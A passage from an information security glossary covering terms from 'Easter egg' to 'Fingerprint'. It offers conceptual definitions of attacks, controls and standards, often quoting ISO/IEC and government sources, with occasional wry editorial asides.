undocumented, and often convoluted, set of commands and keystrokes are
entered. Easter eggs are typically used to display the credits for the
development team and are intended to be nonthreatening” (NIST SP 800-28).
|
|
Eavesdrop
|
To listen-in or snoop
on someone or something covertly.
May involve literally listening and watching from nearby, or remotely using surveillance
equipment such as binoculars, bugs,
cameras, spyware,
keyloggers and
backdoors, network analysers,
passive reflectors modulating infrared laser beams, wiretaps etc., with obvious privacy
implications.
|
|
ECC
(Elliptic Curve Cryptography)
|
Form of public
key encryption
that relies on the unique mathematical properties of elliptic curves to
generate pairs of related keys.
|
|
ECCM
(Electronic Counter-CounterMeasures),
ECP
(EleCtronic
Protective measures)
|
Defensive
techniques to avoid electronic communications or systems being compromised by an adversary – or indeed by friendly forces
– using ECM, for
example using spread-spectrum, burst, covert and/or spoof transmissions, and TEMPEST.
|
|
Echelon
|
NSA-led global mass
surveillance program
launched in the 1960s in conjunction with what became the Five Eyes. France has a similar program dubbed
‘Frenchelon’ with satellite ground stations (‘spy stations’) located in
mainland France and some of its overseas territories.
|
|
ECM
(Electronic CounterMeasures)
|
Offensive
techniques to disrupt an adversary’s electronic communications or systems, for
instance by jamming their radio links, transmitting false beacons or
misleading their automated target-acquisition systems. The electronic
equivalent of chaff (metallic strips dispensed in large numbers by a moving
vehicle to confuse radar systems). See also ECCM.
|
|
Economic espionage
|
Euphemism for state-sponsored industrial
espionage (surveillance,
spying) directed
against foreign corporations and (usually) their intellectual assets.
|
|
Eco-warrior
|
Activist
or extremist
who may sabotage
organisations
they believe to be exploiting
and wantonly harming the natural environment through their operations (e.g. mining
and oil companies destroying the rain forests, or ‘scientific’ whaling).
|
|
[Information
security] Education
|
General knowledge
and expertise in relation to recognizing and minimizing information risks
through appropriate security
controls. Achieved initially through the school/education system,
advice from parents and teachers etc. and then extended through
security training
and awareness
activities during employment, supplementing work and general life
experience. [In general] “Process of receiving or giving systematic
instruction, especially at a school or university” (ISO/IEC 19896-1:2018).
|
|
Effectiveness
|
Measure
of the quality or suitability of something for some purpose. “Extent to
which planned activities are realized and planned results achieved” (ISO/IEC 27000).
“Ability to apply knowledge and skills in a productive manner, characterized
by attributes of behaviour such as aptitude, initiative, enthusiasm,
willingness, communication skills, team participation, and leadership”
(ISO/IEC 19896-1:2018).
|
|
Efficiency
|
Measure
of the consumption of resources by something. “Relationship between the
results achieved and resources used” (ISO 9000).
|
|
Egress
filtering
|
Blocking
of traffic as it exits a network,
for example to prevent malware-infected or hacked computers on
corporate networks from sending spam
or attacking systems on external networks,
or to block highly classified
information
from passing onto an unclassified
network. Cf. ingress filtering.
|
|
EINSTEIN
|
Covert
US government network
security monitoring/intrusion detection
capability
originally developed by US-CERT and deployed in 2004. The current
incarnation, EINSTEIN 3, is being developed by the NSA. It reportedly monitors traffic flowing through authorized gateways between
the internal government network/s and the outside world, while a cloud-based
distributed sensor version is (also) under consideration, presumably to
counter threats
arising from the Internet
of Things and proliferating Internet connectivity.
|
|
Electronic archive
|
A long-term data
store (see archive).
“Long-term repository of Electronically Stored Information. Notes:
Electronic archives can be on-line, and therefore accessible, or off-line and
not easily accessible. Backup systems (e.g., tape, virtual tape, etc.) are
not intended to be electronic archives, but rather data protection systems
(i.e., recovery mechanisms for disaster recovery and business continuity).” (ISO/IEC 27050-1).
|
|
Electronic discovery,
eDiscovery
|
“Discovery
that includes the identification, preservation, collection, processing,
review, analysis, or production of Electronically Stored Information. Note:
Although electronic discovery is often considered a legal process, its use is
not limited to the legal domain.” (ISO/IEC 27050-1).
|
|
Elevation
or escalation [of privileges]
|
A multi-stage attack
(on a castle, building, system,
application, person,
organisation
etc.) in which an outsider
(e.g. an intruder, hacker
or malware)
first gains entry or a foothold innocuously through an inadequately secured
entry-point to a general access
level, then exploits
internal vulnerabilities
to gain further access to and compromise
assets that are
not directly accessible from outside. Hackers commonly gain unprivileged
access to target
systems first (e.g. by registering as a basic user with limited rights), then use
commands (often scripted in the form of malware) to exploit technical
vulnerabilities, gain privileged
or unrestricted access and hence pwn
the systems.
|
|
Elicitation
|
Social
engineering technique whereby, during an apparently innocuous conversation,
someone is surreptitiously probed
for additional information.
For example, the question “Was John there with Alan?” might prompt the answer
“No, John wasn’t there”. The respondent’s lack of reference to Alan implies
that he was there, hinting at what have been the true purpose of the
question.
|
|
ELINT
(ELectronic INTelligence)
|
Gleaning useful information from the characteristics of
electronic signals, aside from any intended communications content, using
electronic sensors. Spectrum analysis and direction-finding techniques, for
instance, can be used to characterize and perhaps identify a specific source
of radiated electronic signals (not necessarily a radio transmitter as
such). Part of SIGINT.
|
|
Electronic Warfare
(EW)
|
See cyberwar.
|
|
Email
(Electronic mail)
|
Popular communications mechanism that originally used
private commercial networks
(such as AOL, CompuServe and internal corporate networks) then transitioned
to the Internet
in the 1990s. Emails are sent and received asynchronously, meaning they wait
in the recipient’s mailbox until being opened and read, as opposed to
real-time and near-real-time online
chat systems
such as IM. Vulnerable to
numerous information
security threats
and incidents
such as malware,
spam, 419s and other frauds, coercion, social engineering,
unpredictable delays and occasional non-delivery or mis-delivery of messages,
interception
or inappropriate and unauthorized
disclosure of
confidential
information,
hacking of email servers/systems, spoofing of email
headers and message content etc.
|
|
Email
bomb,
spam bomb
|
Attempt to fill or overload a victim’s email system by sending huge quantities of spam to it e.g. by
deliberately disclosing their email address to known spammers and high-volume
mailing lists, causing frustration, cyber harassment and denial of service.
|
|
Emanation security
|
“The counter-measure employed to reduce classified
emanations from a facility and its systems to an acceptable level. Emanations
can be in the form of RF energy, sound waves or optical signals” (NZ information Security Manual).
See also TEMPEST
and SCIF.
|
|
Embedded
malware
|
Malware
(such as APTs)
hidden so deeply within a system
(possibly in the hardware,
microcode, firmware,
device drivers or
operating system
kernel) that only competent forensic
analysis (possibly involving access to the source code, compilers and
specialist tools) may reveal its presence.
|
|
Embedded
system
|
Usually a physically small computer system or subsystem, perhaps a thing, encased
entirely within a piece of electrical, electronic or mechanical equipment
(such as a computerized item of industrial plant, an ICS, used to monitor and control the equipment. Often based on a
pared-down version of the Linux operating
system, designed
to perform specific functions very efficiently, as opposed to multipurpose
computers. May interface to a SCADA
system or the Internet
of Things.
|
|
Embezzlement
|
Theft of assets
entrusted to a fraudster
by the victim e.g. deposits
stolen by a dishonest
fund manager.
See also malfeasance.
|
|
Emergency
access
|
Route in to an access-controlled site, building, room, system etc.
for use in emergency conditions. “The process of a system user accessing
a system that they do not hold appropriate security clearances for due to an
immediate and critical emergency requirement” (NZ information Security Manual).
See also emergency intervention.
|
|
Emergency intervention
|
Situation in which a competent support person is specifically authorized by management to
modify a system
directly, typically through a privileged
emergency user ID,
bypassing or overriding the normal system access controls and code migration processes in order
to diagnose and resolve an urgent production issue.
|
|
Emergency situation
|
“A situation requiring the evacuation of a site.
Examples include fires and bomb threats” (NZ information Security Manual).
|
|
Emotet
|
Multifunctional
malware that has evolved from a bank Trojan in 2014 to a loader for
various forms of malware
today. In the wild
in 2019.
|
|
EMP (Electro-Magnetic
Pulse) weapon,
e-bomb,
HERF (High Energy Radio Frequency) gun
|
Most electrical and electronic devices are inherently highly vulnerable to
extremely strong electromagnetic fields and high voltages (such as those
produced by nearby lightning strikes, nuclear explosions or, at close range, Taser-type
devices), and/or to the accompanying power surges, unless they are sufficiently well designed,
engineered, shielded and protected to be resilient. EMP-based cyberweapons
(missiles, bombs, hand-deployed devices etc.) are intended for cybertage, cyberwar or cyberterrorism,
perhaps physically
damaging critical parts of the enemy’s cyberinfrastructure, for example CHAMP.
|
|
EMS
(Enterprise Mobile Security, Enterprise Mobility
Suite)
|
See MDM.
|
|
EMSEC
(EMissions SECurity)
|
Securing systems
against compromising
emanations e.g. using TEMPEST and Faraday cages. “The
protection resulting from all measures taken to deny unauthorized persons
information of value that might be derived from communications systems and
cryptographic equipment intercepts and the interception and analysis of
compromising emanations from cryptographic—equipment, information systems,
and telecommunications systems.” (Air Force Air Intelligence, Surveillance and
Reconnaissance Agency instruction 33-203, 2011)
|
|
Encapsulating security payload
|
Network
security protocol, part of IPsec. “A protocol
used for encryption and authentication within IPSec” (NZ information Security Manual).
|
|
EnCase
|
The first widely-accepted digital forensics support
tool-suite, used to examine (acquire, analyse and report) digital evidence.
A commercial product from opentext.
|
|
Enclave
|
“Collection of information systems connected by one or
more internal networks under the control of a single authority and security
policy. The systems may be structured by physical proximity or by function,
independent of location.” (CNSSI-4009).
|
|
Enclave
boundary
|
“Point at which an enclave’s internal network service
layer connects to an external network’s service layer, i.e., to another
enclave or to a Wide Area Network (WAN)” (CNSSI-4009).
|
|
Encryption,
encrypt,
encipherment
|
Application of cryptography
to maintain the confidentiality
of information
by preventing anyone without the correct decryption key/s gaining access to or surmising the plaintext
content.
|
|
End
user,
user
|
Term used by snooty ICT professionals to refer (often dismissively or
disparagingly) to the people who use IT systems, networks, devices, services etc.
|
|
End User Computing
(EUC)
|
The practice of software development, implementation
and/or support by citizen
programmers.
|
|
Enforce,
enforcement
|
The use of sanctions to discourage and penalize noncompliance
or non-fulfilment of one or more obligations, expectations etc. Has
distinctly negative, demotivational connotations, as opposed to reinforcement.
|
|
ENIAC
(Electronic Numerical Integrator And Calculator)
|
The first Turing-complete (general purpose) electronic
computer. Designed
at the University of Pennsylvania by Mauchly and Eckert, ENIAC was delivered
to the US Army in 1946 to calculate ballistics tables. It used 17,500
electronic valves (vacuum tubes) and 1,500 relays, weighed 30 tons and
consumed 150kW. It was programmed mechanically over several days using patch
leads and switches. 50 years on, ENIAC was replicated as a single integrated
circuit approximately 3½ cm square, similar to a Pentium CPU chip. See also Colossus.
|
|
Enrolment
|
Process
whereby, for example, the physical characteristics of people whose identities have
been authenticated
by some other means are measured
by and registered on biometric
security devices,
thus associating biometric characteristics with user IDs.
|
|
Enterprise
|
“A natural or legal person engaged in an economic
activity, irrespective of its legal form, including partnerships or
associations regularly engaged in an economic activity” (GDPR).
|
|
Enterprise Risk
Management (ERM)
|
High level corporate governance activity for systematically identifying,
assessing, treating and monitoring/tracking
risks that are
significant to the enterprise or organisation as a whole (sometimes known
as ‘bet the farm’ risks), involving aspects such as business/commerce,
strategy, politics, health-and-safety, finance, currency, products, markets,
environment, people, compliance,
technology, information,
infrastructure etc.
|
|
Enticement
|
Inducing or permitting
someone to commit a crime that they would have committed anyway (e.g. the
police using closely-monitored
‘bait cars’ to entice vehicle thieves) then prosecuting them for so doing. Cf. entrapment.
|
|
Entrapment
|
Inducing someone to commit a crime they would not
otherwise have committed. Prosecution is likely to fail if the court accepts
this as a legitimate
defence. Cf. enticement.
“Deliberate planting of apparent flaws in an information system for the
purpose of detecting attempted penetrations” (CNSSI-4009).
|
|
Entropy
|
A measure
of randomness or
disorder. A high degree of entropy in encryption keys is vital to prevent cryptanalysts
directly guessing the keys by brute
force, while high entropy in the cyphertext reduces the possibility of
revealing useful information
through discernible patterns. Keys generated pseudo-randomly have marginally less
entropy than those of the same length generated randomly, a small difference
that weakens them.
|
|
EPIC
(Electronic Privacy
Information Center)
|
Privacy
advocacy and activist group, describing itself as a “public interest research
center in Washington, DC”. EPIC website.
|
|
EpicShelter
|
Secret
US surveillance
system allegedly
developed by Ed Snowden according to Oliver Stone’s biographical film Snowden.
|
|
Equation
Group
|
Hacker
group allegedly associated with the NSA.
|
|
Error
|
Mistake, accident,
unintended discrepancy etc. A breakdown or failure of integrity.
Although errors cause a far greater number of information security incidents than deliberate attacks, the effects
are usually relatively minor. Furthermore, errors are often noticed
and corrected by the people, systems
or devices that
caused them, with next to no consequential impact. Rarely, however,
unnoticed/uncorrected errors (such as software
bugs and the inappropriate use of statistics) can have extremely
serious or grave consequences such as corrupting business- or safety-critical data or leading to bad decisions.
|
|
Escape
|
In virtualisation,
refers to making an unauthorized
connection from a guest
system into the hypervisor,
host operating system
or another guest. Allows hacking
and data leakage
between virtual systems, or access
from a sandbox
to the host.
|
|
Escort
|
“A person who ensures that when maintenance or repairs
are undertaken to IT equipment that uncleared personnel are not exposed to
information” (NZ information Security Manual).
|
|
Escrow
|
The safekeeping or custodianship of an asset by a trusted person or organisation (the ‘escrow agent’),
enabling its release to one or more third parties if certain conditions
(usually specified formally in a contract)
are met. Examples include key
escrow and source
code escrow. The control
hinges on the trustworthiness
and competence
of the agent.
|
|
Escrow
fraud
|
Type of fraud
in which an escrow
agent betrays the trust
placed in them by the owner
of assets placed
in their care, normally embezzling
the assets.
|
|
ESI
(Electronically Stored Information)
|
Data.
“Data or information of any kind and from any source, whose temporal
existence is evidenced by being stored in or on any electronic medium.
Notes: ESI includes traditional e-mail, memos, letters, spreadsheets,
databases, office documents, presentations and other electronic formats
commonly found on a computer. ESI also includes system, application and
file-associated metadata such as timestamps, revision history, file type,
etc. Electronic medium can take the form of, but is not limited to, storage
devices and storage elements.” (ISO/IEC 27040).
|
|
ESI
analysis
|
Forensic
examination/study of ESI.
“Element of an electronic discovery process focused on evaluating
Electronically Stored Information for content and context to identify facts,
relationships, key patterns, and other features that can lead to improved
understanding of an ESI corpus. Note: Content and context can include key
patterns, topics, people and discussions.” (ISO/IEC 27050-1).
|
|
ESI
collection
|
Seizure or collection of ESI, usually from a crime scene. “Element
of an electronic discovery process focused on gathering Electronically Stored
Information and other related material” (ISO/IEC 27050-1).
|
|
ESI identification
|
“Element of an electronic discovery process focused on
locating potential sources and the criteria for selecting potentially
relevant Electronically Stored Information” (ISO/IEC 27050-1).
|
|
ESI
preservation
|
“Element of an electronic discovery process focused on
ensuring that Electronically Stored Information is protected against
inappropriate alteration or destruction. Note: In some matters or
jurisdictions, there can be requirements to prevent spoliation of
Electronically Stored Information” (ISO/IEC 27050-1).
|
|
ESI
processing
|
Extraction of ESI
from storage media
etc. “Element of an electronic discovery process focused on extracting
Electronically Stored Information and converting it, if necessary, to forms
more suitable for ESI review and ESI analysis” (ISO/IEC 27050-1).
|
|
ESI
production
|
Providing, revealing or presenting ESI e.g. in court. “Element
of an electronic discovery process focused on delivering or making available
Electronically Stored Information. Notes: ESI production can also include
getting Electronically Stored Information in appropriate forms and using
appropriate delivery mechanisms. ESI production can be to any person or organisation”
(ISO/IEC 27050-1).
|
|
ESI
review
|
“Element of an electronic discovery process focused on
screening Electronically Stored Information based on specific criteria.
Note: In some matters or jurisdictions, Electronically Stored Information
that is considered privileged can be excluded from production” (ISO/IEC 27050-1).
|
|
Espionage
|
See spying.
|
|
Essential communications
|
“Communications whose contents are necessary for the
prevention of or relief from disasters and for the maintenance of public
order in adverse conditions” (ISO/IEC 27011).
|
|
EternalBlue
|
NSA
hacking tool exploits a zero-day vulnerability
in Windows SMB (Server Message Block). A month prior to
hacker group Shadow Brokers
disclosing this and other tools in April 2017, the NSA notified Microsoft who
issued a critical patch.
Networked systems that were
not patched in time (including old Windows systems no longer fully supported)
were vulnerable to the Petya, WannaCry and other ransomware outbreaks.
|
|
Ethereal
|
See Wireshark.
|
|
Ethics,
ethical
|
Behaviour broadly accepted as appropriate, right and
proper, at least within the culture or organisation in which it occurs. Ethical
beliefs and standards vary, however. A practice considered ethical within
the hacker
underground, for example, may be entirely unacceptable and
inappropriate (unethical)
to society at large including information
security and law enforcement
professionals.
|
|
Ethical
dilemma
|
Situation in which ethical constraints, objectives, rules, laws, regulations, directives etc.
come into conflict, requiring a worker
either to make a difficult personal decision regarding how to resolve the
dilemma and achieve the most beneficial or least damaging net outcome, or to
seek further guidance from management,
trustworthy
colleagues etc.
|
|
Ethical
hacking
|
Hacking
or penetration testing
of ICT networks and systems etc. by
white hats that
is explicitly sanctioned, authorized,
permitted or
commissioned by their owners
for the purposes of identifying known security vulnerabilities. Normally
covered by an explicit contract
defining the scope, nature of tests permitted and forbidden, constraints, confidentiality
of the results etc.
|
|
Ettercap
|
Hacking/penetration testing
tool, capable of mounting MITM
attacks on LAN
traffic.
|
|
European Data Protection Board
|
European Union body tasked with supervising and
coordinating data
protection (privacy)
arrangements under GDPR
across Europe, for instance liaising with and guiding national privacy
ombudsmen or supervisory authorities.
|
|
EV
(Extended Validation)
|
Certification
authorities may conduct additional checks on applicants for their digital certificates,
typically offering the resulting ‘EV’ certificates at a higher price
reflecting the additional costs and trustworthiness. They typically confirm
the identity
and legal status of the applicant organisation with the relevant national authorities – a
kind of corporate background
check – as required by the CA/Browser Forum, an industry body.
Several inappropriate certification incidents (mis-issuance) call into question the
value of voluntary compliance
with an industry code in this area, leading to calls for stronger oversight,
tighter regulation and accreditation,
if not a complete overhaul of the certification business.
|
|
Evaluator
|
Person who evaluates (checks, tests and compares)
something against expectations, requirements or criteria. “Individual
assigned to perform evaluations in accordance with a given evaluation
standard and associated evaluation methodology. Note: An example of an
evaluation standard is ISO/IEC 15408 with the associated evaluation
methodology given in ISO/IEC 18045” (ISO/IEC 19896-1:2018).
|
|
Event
|
Generally, a trivial or benign form of incident, possibly just a small part of a
developing situation (perhaps a symptom, indicator, flag or forewarning). For
example, while an event such as single logon failure may simply result from
someone forgetting or mistyping their password, it could be the first
indication of a determined brute
force attack
by hackers. “Occurrence
or change of a particular set of circumstances. Notes: an event can be one
or more occurrences, and can have several causes; an event can consist of
something not happening; an event can sometimes be referred to as an
‘incident’ or ‘accident’” (ISO/IEC 27000). See also information security
event.
|
|
Evidence
|
Information
which proves or disproves something. See also digital evidence and forensic evidence.
|
|
Evidence preservation facility
|
Typically a firesafe, vault, evidence room or similar
secure storage facility providing excellent physical protection for forensic evidence.
“Secure environment or a location where collected or acquired evidence is
stored. Note: An evidence preservation facility should not be exposed to
magnetic fields, dust, vibration, moisture or any other environmental
elements (such as extreme temperature or humidity) that may damage the
potential digital evidence within the facility.” (ISO/IEC 27037).
|
|
Evil
twin
|
Network
hack using a fake/spoofed public Wi-Fi hotspot that
forwards traffic from connected devices
to a genuine public Wi-Fi hotspot or otherwise to the Internet. The evil twin silently intercepts/monitors the
traffic and has full access
to any unencrypted content. It may also perform man-in-the-middle attacks,
surreptitiously manipulating the traffic en route.
|
|
Exculpatory
|
Forensic
evidence allegedly demonstrating that someone or something was not
involved in an incident,
clearing them of blame. Cf. inculpatory.
|
|
Exception
|
An extraordinary occurrence, such as an unusual event, an
unanticipated (and therefore potentially unhandled) state, condition, data value or unauthorized noncompliance.
Cf. exemption.
“The formal acknowledgement that a requirement of the NZISM cannot be met
and that a dispensation from the particular compliance requirement is granted
by the Accreditation Authority. This exception is valid for the term of the
Accreditation Certificate or some lesser time as determined by the
Accreditation Authority” (NZ information Security Manual).
|
|
Exceptions and waivers
|
“An exception is NOT the same as a waiver. An
exception means that the requirement need not be followed. A waiver means
that some alternative controls or conditions are implemented” (NZ information Security Manual).
|
|
Execution
|
(a) Formal signing demonstrating commitment to a
legally-binding contract
or agreement by duly authorized
signatories. (b) Running a computer program. (c) Capital punishment.
|
|
Executive
management,
executives, ‘the Execs’,
senior management,
top management,
C-suite,
mahogany row etc.
|
The most senior managers running the organisation (in conjunction with lower management
tiers) on a day-to-day basis who are ultimately accountable to stakeholders for protecting and exploiting the organisation’s information assets. On behalf of the organisation’s
legal owners and
other external stakeholders, the governing body (normally the Board of Directors)
gives executives both the obligation
or responsibility
and the authority
or control over
the organisation’s resources, for example ensuring that information risks
are identified, assessed and treated in accordance with the organisation’s
business objectives,
through diligence and due
care. In short, the buck stops here. “Person or group
of people who have delegated responsibility from the governing body for
implementation of strategies and policies to accomplish the purpose of the organisation.
Note: executive management is sometimes called top management and can include
Chief Executive Officers, Chief Information Officers, Chief Financial Officers,
Chief Information Officers, and similar roles” (ISO/IEC 27000).
|
|
Exemption,
waiver
|
Noncompliance
explicitly authorized
by the relevant authority
after due consideration and consultation with information risk and security experts. Normally limited in
duration as well as scope, and compensating controls may be mandated.
The person requesting an exemption, normally the Information Asset Owner or Risk Owner
remains personally accountable
for the residual risk
and any consequential incidents.
Cf. exception.
|
|
Exfiltration,
exfiltrate
|
Covert
extraction of sensitive/valuable
information assets
from a supposedly secure system,
device, network or organisation.
Normally implies that the information
is being ‘pushed out’ or ‘carried out’ by an agent within (a person or malware), but it
may also be ‘pulled out’ by someone on the outside (a social engineer,
hacker etc.).
Cf. infiltration.
|
|
Exit
strategy
|
Whereas normally we consider the risks when going into a new situation,
there may also be substantial risks involved in staying there and/or in
getting out. With cloud
computing for example, a breakdown in the relationship with the CSP may lead to
problems for the organisation
in retrieving its information
and transferring the service to another CSP or in-house. Preparing a
strategy for exiting the relationship gracefully is a form of business continuity management, part of risk management.
|
|
Experience
|
The intangible knowledge, wisdom, competence and/or skill that accumulates as one does
something repeatedly. A valuable information asset. “Involvement at a
practical level with projects related to the field of competence” (ISO/IEC
19896-1:2018).
|
|
Expert
witness
|
Person acknowledged to have extensive experience and skill in specialized subjects such as information security
or forensics,
capable of analysing, presenting and interpreting the facts objectively for
the court. Offers an informed, dispassionate, unbiased opinion on complex
forensic evidence.
|
|
Exploit,
“sploit”
|
Verb: to take advantage of or use. Although in the
information security
domain the term usually implies a negative, unethical, unwelcome, inappropriate, unauthorized
or harmful activity, it can also be positive (e.g. an organisation legitimately
exploits its assets
and capabilities to achieve its business objectives). Noun: the hacking program, malware payload, script,
tool and/or process
used by a threat agent
to take advantage of a security
vulnerability. “Sploit” is a leet form.
|
|
Exploit kit
|
See crimeware.
|
|
Exposure
|
The degree to which a vulnerability could be exploited by a threat. For example, security
vulnerabilities caused by bugs
in Internet-facing
web servers tend
to be far more exposed to hacking
than those affecting internal corporate systems, with several layers of protection
between them and external hackers.
|
|
External
|
Outside the organisation’s physical, organisational and network boundary. Cf. internal.
|
|
External
context
|
“External environment in which the organisation seeks
to achieve its objectives. Notes: external context can include the
following: the cultural, social, political, legal, regulatory, financial,
technological, economic, natural and competitive environment, whether
international, national, regional or local; key drivers and trends having
impact on the objectives of the organisation; and relationships
with, and perceptions and values of, external stakeholders.” (ISO Guide 73).
|
|
External
party
|
Term used in the ISO27k standards as a synonym for ‘third party’.
External implies either a separate organisation or a part of the same organisation
that is outside the scope of its ISMS.
|
|
Extinguisher
|
Manual or automated device for putting out fires using an extinguishant gas (such as
carbon dioxide, nitrogen or FM-200),
liquid (such as water), foam, powder or cloth (fire blanket). May be
portable/hand-held, mounted to a vehicle, or permanently installed within a
facility. A corrective
control.
|
|
Extortion
|
The use of coercion
(typically involving threats
of cybertage,
disclosure of confidential
information
or denial of
service through ransomware,
or physical harm) to obtain assets
(generally money) from a target
individual or organisation.
|
|
Extranet
|
“Extension of an organisation's Intranet, especially
over the public network infrastructure, enabling resource sharing between the
organisation and other organisations and individuals that it deals with by
providing limited access to its Intranet. Note: For example, an organisation's
customers can be provided access to some part of its Intranet, creating an
extranet, but the customers cannot be considered ‘trusted’ from a security
standpoint.” (ISO/IEC
27033-1).
|
|
Extraterritoriality
|
A legal principle that
potentially gives the authorities powers over foreigners outside their normal
jurisdiction, for example prosecuting and penalizing non-European organisations for failing to comply with GDPR by protecting the privacy
rights of EU citizens whose personal information they obtain.
|
|
Extremist,
extremism
|
Someone whose views or ideology are way out of line with
the general population. Between activist
and terrorist
on a notional threat
scale.
|
|
Extrusion
|
Unauthorized
transfer of information
from the internal
to external
environments, typically using network
connections and/or various covert
channels or methods
such as a drop. Cf. intrusion.
|
|
Facility
|
Site, installation, building, room etc. “An
area that facilitates government business. For example, a facility can be a
building, a floor of a building or a designated area on the floor of a
building” (NZ information Security Manual).
|
|
Failover,
fail-over
|
Manual or automated process for transferring resilient ICT services between redundant
equipment, campuses and/or network
routes, providing high availability,
hopefully averting more serious incidents.
“The capability to switch over automatically (typically without human
intervention or warning) to a redundant or standby information system upon
the failure or abnormal termination of the previously active system” (CNSSI-4009).
|
|
Failsafe,
fail-safe,
fail-secure,
fail-closed
|
Engineering concept used heavily in safety-critical
or other high-security system
and process designs whereby a control failure or
adverse situation leaves the system/process in an inherently safe or secure – albeit
perhaps only partially functional – state or condition.
|
|
Fail-soft,
fail-gracefully
|
Resilience
arrangement. See also load-shedding.
“Selective termination of affected nonessential processing when hardware
or software failure is determined to be imminent” (CNSSI-4009).
|
|
Fail-unsafe,
fail-unsecure,
fail-open
|
Undesirable state for systems and processes that have not been explicitly
designed to be
safe and secure (i.e. failsafe) under all conditions, and hence are
‘fragile’. For example, an access
control that fails spontaneously or is actively disabled or
bypassed in an attack,
may permit inappropriate access
that it was supposed to have prevented or at least detected. In the absence
of compensating
controls, security by obscurity can fail spectacularly if details
of a supposedly obscure vulnerability
are widely disclosed.
|
|
FAIR
(Factor Analysis of
Information Risk)
|
Open Group’s structured risk analysis method examines various parameters
(factors) to estimate the magnitude and probability of losses and hence risk.
|
|
Fair
use
|
Copyright
laws generally permit limited use of copyright materials without the intellectual property owner’s explicit permission.
Such fair use exemptions
typically allow reproduction (such as quoting and summarizing) of
non-substantial or inconsequential parts of copyright materials for limited
research and educational
purposes, or to create backup/archive copies.
|
|
Faith
|
Sometimes described as ‘blind trust’ or ‘wishful thinking’, faithful
people believe in something without evidence of its validity and veracity,
sometimes to the point of ignoring or flatly and irrationally denying
credible evidence to the contrary. Faith is not a control but a potentially harmful form of
delusion, manipulation, coercion
or social
engineering.
|
|
Fake
|
Spoofed
item that misrepresents
the genuine article. See also counterfeit.
|
|
Fake
news
|
Propaganda
in the form of fabricated ‘news’ stories circulated online through websites
and social media,
with the specific aim of misleading and influencing (coercing) the general population. Fake
news stories are also used as clickbait.
|
|
Fallback
|
Use of robustness,
resilience, redundancy and/or
failover
features in a system
or process to
continue to deliver limited critical services under emergency conditions when
the primary mechanisms have been compromised in an incident. A form of contingency planning.
See also failover.
|
|
False
acceptance,
type I error
|
Authentication
failure in which an impostor is incorrectly associated with someone else’s identity. Cf.
false rejection.
|
|
False Acceptance
Rate
(FAR)
|
Commonplace metric
for a biometric
system, measuring
the proportion of authentications
that exhibit type 1
errors. “The measure of the likelihood that the biometric
security system will incorrectly accept an access attempt by an unauthorized
user. A system’s false acceptance rate typically is stated as the ratio of
the number of false acceptances divided by the number of identification
attempts.” (CNSSI-4009). See also False Rejection Rate.
|
|
False
flag
|
An attempt to get an attack attributed to an innocent party,
deflecting blame from the perpetrator while denigrating the accused.
|
|
False
rejection,
type II error
|
Authentication
failure in which the system
denies or fails to confirm a person’s true identity. Cf. false acceptance.
|
|
False Rejection
Rate
(FRR)
|
Commonplace metric
for a biometric
system, measuring
the proportion of authentications
that exhibit type II
errors. “The measure of the likelihood that the biometric
security system will incorrectly reject an access attempt by an authorized
user. A system’s false rejection rate typically is stated as the ratio of
the number of false rejections divided by the number of identification
attempts.” (CNSSI-4009). See also False Acceptance Rate.
|
|
False sense of security
|
Vulnerability
involving an unwarranted and inappropriate faith in the security/control
arrangements stemming from inadequate assurance and naïveté – for example,
believing that antivirus
software totally prevents malware incidents.
|
|
Fast-flux
DNS,
fast-flux botnet
|
Black
hat high-availability
and concealment technique uses proxy servers or DNS changes to redirect botnet traffic
(commands and/or data)
dynamically to any of a set of distributed servers so that, even if
individual servers in the set are shut down by the authorities, others remain reachable.
|
|
Fault
|
Problem with information processing or communications systems including a security incident, complete
or partial system failure (outage),
program error/bug, virus, or some other generally
unanticipated and undesirable mode of operation etc.
|
|
Fault
tolerance
|
High-availability
design goal that systems should
survive faults and
other incidents
that would otherwise cause failures or unplanned outages. A strong but highly specific
form of resilience.
|
|
Fax
machine
|
“A device that allows copies of documents to be sent
over a telephone network” (NZ information Security Manual).
No kidding!
|
|
FBI
(Federal Bureau of Investigation)
|
Spooky
US government agency responsible for domestic intelligence and surveillance deliberately targeting US
citizens. Founded by J Edgar Hoover. See also CIA and DHS.
|
|
FedRAMP
(Federal Risk and Authorization Management Program)
|
US program imposing good practice security standards (principally NIST SP800-53)
on the suppliers of cloud
computing services for government use.
|
|
Femto
cell,
home cell,
small cell
|
A cellphone repeater or base station providing cellular
service in a limited local area, typically within a building, where the conventional
cellular coverage is limited or non-existent. “Small, low-power cellular
base station. Note: A femto cell is typically designed for use in a home or
small businesses” (ISO/IEC
27033-6).
|
|
Fibre
channel,
fiber channel
|
“Serial I/O interconnect capable of supporting multiple
protocols, including access to open system storage, access to mainframe
storage, and networking. Note: Fibre Channel supports point to point,
arbitrated loop, and switched topologies with a variety of copper and optical
links running at speeds from 1 gigabit per second to over 10 gigabits per
second” (ISO/IEC
27040).
|
|
Fibre channel interconnect
|
“Serial Small Computer System Interface (SCSI)
transport protocol used on Fibre Channel interconnects” (ISO/IEC 27040).
|
|
Fidelity insurance,
fidelity bond
|
Insurance
against the costs and losses to an organisation arising from incidents
involving deliberate acts of disloyalty or dishonesty by its workers or agents (e.g. advisors
and other service providers).
|
|
Fiduciary
|
A responsibility
based on trust and
ethics, for
example officers of an organisation
are legally and morally required, obliged or bound to act in the best
interests of the organisation’s owners
and other stakeholders,
even if doing so conflicts with their personal interests. See also malfeasance, due care and fidelity insurance.
|
|
Fileless
malware
|
Cloud-based malware
that executes in RAM, exploiting
apps and utilities
such as web browsers, PowerShell
and WMI supposedly
without leaving behind distinctive files on an infected system’s disks. Powersploit’s obfuscated PowerShell scripts, for
instance, may not be detected reliably by antivirus packages and, even if they
remain on the disk, may escape forensic
analysis. Malware may be located using registry entries and hidden inside
other files or in obscure directories.
|
|
Filing
system
|
Structured, systematic, organised and usually indexed or catalogued
arrangement for information
storage, search, retrieval and referencing. “Any structured set of
personal data which are accessible according to specific criteria, whether
centralised, decentralised or dispersed on a functional or geographical
basis” (GDPR).
|
|
Filter
|
“A device that controls the flow of data in accordance
with a security policy” (NZ information Security Manual).
|
|
Filtering
|
“Process of accepting or rejecting data flows through a
network, according to specified criteria” (ISO/IEC 27033-1).
|
|
Fingerprint
|
Literally, the print mark left behind on a surface by a
finger, a biometric.
Often used figuratively to indicate characteristics that uniquely identify a
person (e.g. using DNA profiling), system or data. Despite theoretical claims as to
their uniqueness, gathering and analysing any kind of fingerprint creates
practical constraints on the scientific accuracy, hence there is a small but
finite possibility that fingerprints from different individuals, systems or
